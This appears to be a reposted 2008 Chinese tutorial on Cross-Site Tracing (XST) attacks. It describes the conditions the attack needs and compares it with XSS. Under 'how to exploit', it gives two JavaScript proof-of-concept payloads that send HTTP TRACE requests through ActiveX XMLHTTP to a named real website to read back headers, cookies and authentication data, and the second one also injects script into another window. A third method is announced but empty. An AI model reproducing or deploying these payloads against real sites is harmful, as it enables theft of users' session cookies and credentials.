基础知识XST攻击理论及手法讲解

王朝other·作者佚名  2008-05-21
窄屏简体版  字體: |||超大  

XST攻击描述:

攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。

XST攻击条件:

1、需要目标web服务器允许Trace参数;

2、需要一个用来插入XST代码的地方;

3、目标站点存在跨域漏洞。

XST与XSS的比较:

相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。

优点:可以绕过一般的http验证以及NTLM验证

如何利用:

手法1:

<SCRIPT type=text/java script><!--function xssTRACE(){var xmlHttp=new ActiveXObject("Microsoft&#46;XMLHTTP");xmlHttp&#46;open("TRACE","http://wmjie&#46;51&#46;net/swords/",false);xmlHttp&#46;send();xmlDoc=xmlHttp&#46;responseText;alert(xmlDoc);}//--></SCRIPT><BR><INPUT onclick=xssTRACE(); type=button value="XSS TRACE">手法2: <SCRIPT type=text/java script><!--function xssTRACE() {var openWin=open("blank&#46;htm","swords","width=500,height=400");var otraceswords=openWin&#46;external;openWin&#46;location&#46;href="http://wmjie&#46;51&#46;net/swords/";setTimeout(function () {//以下必须写在一行otraceswords&#46;NavigateAndFind('java script:xmlHttp=new ActiveXObject("Microsoft&#46;XMLHTTP");xmlHttp&#46;open("TRACE","http://wmjie&#46;51&#46;net/swords/",false);xmlHttp&#46;send();xmlDoc=xmlHttp&#46;responseText;alert("不用document&#46;cookie 显示站点wmjie&#46;51&#46;net/swords/ 的头信息。

" + xmlDoc);',"","");},1024);}//--></SCRIPT><BR><INPUT onclick=xssTRACE(); type=button value="XSS TRACE">

手法3:

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航